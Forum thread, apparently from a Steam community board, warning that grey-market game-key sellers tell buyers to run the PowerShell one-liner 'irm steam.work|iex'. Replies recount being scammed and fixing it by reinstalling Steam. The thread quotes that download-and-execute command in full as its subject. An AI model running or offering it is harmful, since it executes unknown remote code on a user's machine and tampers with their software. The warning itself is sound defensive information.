I am here to prevent steam users from executing this code in powershell.
Hello everyone, judging from the title, aren't you curious what code?

Well, I am here to tell you about this sketchy code.
irm steam.work|iex <-

What does this code do?
Apparently, This command will replace some files in your Steam client , allowing Steam to connect to the pirate dealer's server during verification. So for example, if you buy the cheap game, the pirater would ask u to run this command because it can allow them to give you your game.. except that the game is not steam verified. Even if you have the game on your library, it does not show in the store that you have own the game. So beware.

If you are asked to exit steam and enter win+r, it means that what you bought is not the game itself, but a game shared account. You can play, but the game is not yours.

DO NOT EXECUTE THE CODE IN POWERSHELL.

the solution is to reinstall steam again.

I have fallen for it, luckily, I manage to reinstall steam and remove the game. Please buy games from steam, if you plan to buy keys, please check whether they are trusted or not. Thank you for reading this.

So basically your saying
Dont buy dodgy game from whatever dodgy site you bought it from
Heh, I have read about this.

A compatriot of mine was tricked into selling these 'keys' when in fact it was just an attempt to play the game on a pirated server. :yella_excited:

How much did you get ripped off? The guy I mentioned above sold this technique in disguise as many AAA games like Elden Ring and Starfield keys so they racked up a huge amount of profit. :yella_hurt:
I once bought a kettle from a guy in this way, I thought it was a decent deal, he disappeared around the corner with my cash and never came back.

Moral of the story, warning people is pointless, everyone has to learn the hard way.
It looks like that command downloads and runs something from someone.
Not just "changes things".
I met this issue just now, I bought the key at an extremely low price and everything looks trusted except the command. But when I opened the workshop I found it didn't work. That makes me google the suspicious command. I found it here, I reinstalled Steam and asked them to refund me. luckily I got my money back. NEVER DO IT AGAIN!!!
This thread was quite old before the recent post, so we're locking it to prevent confusion.
